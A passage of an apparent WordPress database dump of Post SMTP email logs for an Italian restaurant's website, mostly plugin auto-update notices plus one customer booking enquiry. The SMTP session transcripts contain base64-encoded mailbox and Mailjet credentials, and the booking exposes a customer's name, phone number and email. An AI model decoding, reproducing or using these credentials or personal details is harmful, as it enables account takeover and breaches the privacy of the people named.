FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Raffaele biondi <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: raf.biondi@libero.it\r\nMessage-Id: <7de692cb5a4be1801923747a0a0049fb@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"Conferma prenotazione\"\r\nDate: Thu, 05 Nov 2020 19:23:34 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Raffaele biondi <raf.biondi@libero.it>=0ATelefono: 3479247631=0AOgge=\r\ntto: Conferma prenotazione=0A=0ACorpo del messaggio:=0ABuonasera sono a=\r\n chiedere conferma della corretta prenotazione effettuata tramite sito p=\r\ner domani 6/11  pranzo per 2 nome Raffaele biondi grazie=0A=0AAccettato=\r\n=0A=0A--=0AQuesta e-mail =C3=A8 stata inviata da un modulo di contatto s=\r\nu Sol Y Mar (https://www.ristorantesolymar.it)\r\n.\r\n250 OK id=1kakr8-0005WI-E0\r\n'),(22516,1229,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(22517,1229,'success',''),(22518,1229,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22519,1229,'to_header','webmaster@baldisserri.com'),(22520,1229,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(22521,1229,'original_to','webmaster@baldisserri.com'),(22522,1229,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22523,1229,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- WooCommerce version 4.6.2\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22524,1229,'original_headers',''),(22525,1229,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Thu, 05 Nov 2020 19:24:06 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(22526,1230,'solution','Not found, check status column for more info.'),(22527,1230,'success','1'),(22528,1230,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22529,1230,'to_header','webmaster@baldisserri.com'),(22530,1230,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(22531,1230,'original_to','webmaster@baldisserri.com'),(22532,1230,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22533,1230,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- WooCommerce version 4.6.2\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22534,1230,'original_headers',''),(22535,1230,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Thu, 05 Nov 2020 19:24:08 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <5a67da7161e8ec16e65e02f56e2e4543@ristorantesolymar.it>\r\nSubject: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated\r\nDate: Fri, 06 Nov 2020 00:24:08 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- WooC=\r\nommerce version 4.6.2=0A=0A=0AIf you experience any issues or need suppo=\r\nrt, the volunteers in the WordPress.org support forums may be able to he=\r\nlp.=0Ahttps://wordpress.org/support/forums/=0A=0AThe WordPress Team\r\n.\r\n250 OK id=1kapY0-0005Kj-KB\r\n'),(22536,1231,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(22537,1231,'success',''),(22538,1231,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22539,1231,'to_header','webmaster@baldisserri.com'),(22540,1231,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(22541,1231,'original_to','webmaster@baldisserri.com'),(22542,1231,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22543,1231,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- WooCommerce version 4.7.0\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22544,1231,'original_headers',''),(22545,1231,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Tue, 10 Nov 2020 19:26:01 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(22546,1232,'solution','Not found, check status column for more info.'),(22547,1232,'success','1'),(22548,1232,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22549,1232,'to_header','webmaster@baldisserri.com'),(22550,1232,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(22551,1232,'original_to','webmaster@baldisserri.com'),(22552,1232,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22553,1232,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- WooCommerce version 4.7.0\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22554,1232,'original_headers',''),(22555,1232,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Tue, 10 Nov 2020 19:26:04 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <eb318fab226e4f226eab504cd5b0634e@ristorantesolymar.it>\r\nSubject: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated\r\nDate: Wed, 11 Nov 2020 00:26:04 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- WooC=\r\nommerce version 4.7.0=0A=0A=0AIf you experience any issues or need suppo=\r\nrt, the volunteers in the WordPress.org support forums may be able to he=\r\nlp.=0Ahttps://wordpress.org/support/forums/=0A=0AThe WordPress Team\r\n.\r\n250 OK id=1kcdxc-0003BF-BE\r\n'),(22556,1235,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(22557,1235,'success',''),(22558,1235,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22559,1235,'to_header','webmaster@baldisserri.com'),(22560,1235,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(22561,1235,'original_to','webmaster@baldisserri.com'),(22562,1235,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22563,1235,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Cookie and Consent Solution for the GDPR &amp; ePrivacy version 2.3.12\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22564,1235,'original_headers',''),(22565,1235,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 16 Nov 2020 07:22:58 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(22566,1236,'solution','Not found, check status column for more info.'),(22567,1236,'success','1'),(22568,1236,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22569,1236,'to_header','webmaster@baldisserri.com'),(22570,1236,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(22571,1236,'original_to','webmaster@baldisserri.com'),(22572,1236,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22573,1236,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Cookie and Consent Solution for the GDPR &amp; ePrivacy version 2.3.12\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22574,1236,'original_headers',''),(22575,1236,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 16 Nov 2020 07:23:00 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <5c651c6316935de16e5784ee6db80910@ristorantesolymar.it>\r\nSubject: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated\r\nDate: Mon, 16 Nov 2020 12:23:00 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- Cook=\r\nie and Consent Solution for the GDPR &amp; ePrivacy version 2.3.12=0A=0A=\r\n=0AIf you experience any issues or need support, the volunteers in the W=\r\nordPress.org support forums may be able to help.=0Ahttps://wordpress.org=\r\n/support/forums/=0A=0AThe WordPress Team\r\n.\r\n250 OK id=1kedXA-0003RJ-JV\r\n'),(22576,1237,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(22577,1237,'success',''),(22578,1237,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22579,1237,'to_header','webmaster@baldisserri.com'),(22580,1237,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(22581,1237,'original_to','webmaster@baldisserri.com'),(22582,1237,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22583,1237,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Yoast SEO version 15.3\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22584,1237,'original_headers',''),(22585,1237,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Tue, 17 Nov 2020 07:28:05 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(22586,1238,'solution','Not found, check status column for more info.'),(22587,1238,'success','1'),(22588,1238,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22589,1238,'to_header','webmaster@baldisserri.com'),(22590,1238,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(22591,1238,'original_to','webmaster@baldisserri.com'),(22592,1238,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22593,1238,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Yoast SEO version 15.3\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22594,1238,'original_headers',''),(22595,1238,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Tue, 17 Nov 2020 07:28:07 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <162c41c94b1487872c68e0babf15424d@ristorantesolymar.it>\r\nSubject: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated\r\nDate: Tue, 17 Nov 2020 12:28:07 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- Yoas=\r\nt SEO version 15.3=0A=0A=0AIf you experience any issues or need support,=\r\n the volunteers in the WordPress.org support forums may be able to help.=\r\n=0Ahttps://wordpress.org/support/forums/=0A=0AThe WordPress Team\r\n.\r\n250 OK id=1kf05f-0004aK-Mv\r\n'),(22596,1239,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(22597,1239,'success',''),(22598,1239,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22599,1239,'to_header','webmaster@baldisserri.com'),(22600,1239,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(22601,1239,'original_to','webmaster@baldisserri.com'),(22602,1239,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22603,1239,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue version 3.1.0\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22604,1239,'original_headers',''),(22605,1239,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Thu, 19 Nov 2020 07:28:42 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(22606,1240,'solution','Not found, check status column for more info.'),(22607,1240,'success','1'),(22608,1240,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22609,1240,'to_header','webmaster@baldisserri.com'),(22610,1240,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(22611,1240,'original_to','webmaster@baldisserri.com'),(22612,1240,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22613,1240,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue version 3.1.0\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22614,1240,'original_headers',''),(22615,1240,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Thu, 19 Nov 2020 07:28:44 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <0ab198e92a09ff05a814b8f50382c14c@ristorantesolymar.it>\r\nSubject: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated\r\nDate: Thu, 19 Nov 2020 12:28:44 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- News=\r\nletter, SMTP, Email marketing and Subscribe forms by Sendinblue version=\r\n 3.1.0=0A=0A=0AIf you experience any issues or need support, the volunte=\r\ners in the WordPress.org support forums may be able to help.=0Ahttps://w=\r\nordpress.org/support/forums/=0A=0AThe WordPress Team\r\n.\r\n250 OK id=1kfj3M-0005iz-P8\r\n'),(22616,1241,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(22617,1241,'success',''),(22618,1241,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22619,1241,'to_header','webmaster@baldisserri.com'),(22620,1241,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(22621,1241,'original_to','webmaster@baldisserri.com'),(22622,1241,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22623,1241,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- UpdraftPlus - Backup/Restore version 1.16.36\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22624,1241,'original_headers',''),(22625,1241,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Fri, 20 Nov 2020 07:22:55 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(22626,1242,'solution','Not found, check status column for more info.'),(22627,1242,'success','1'),(22628,1242,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(22629,1242,'to_header','webmaster@baldisserri.com'),(22630,1242,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(22631,1242,'original_to','webmaster@baldisserri.com'),(22632,1242,'original_subject','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated'),(22633,1242,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- UpdraftPlus - Backup/Restore version 1.16.36\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(22634,1242,'original_headers',''),(22635,1242,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Fri, 20 Nov 2020 07:22:59 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: 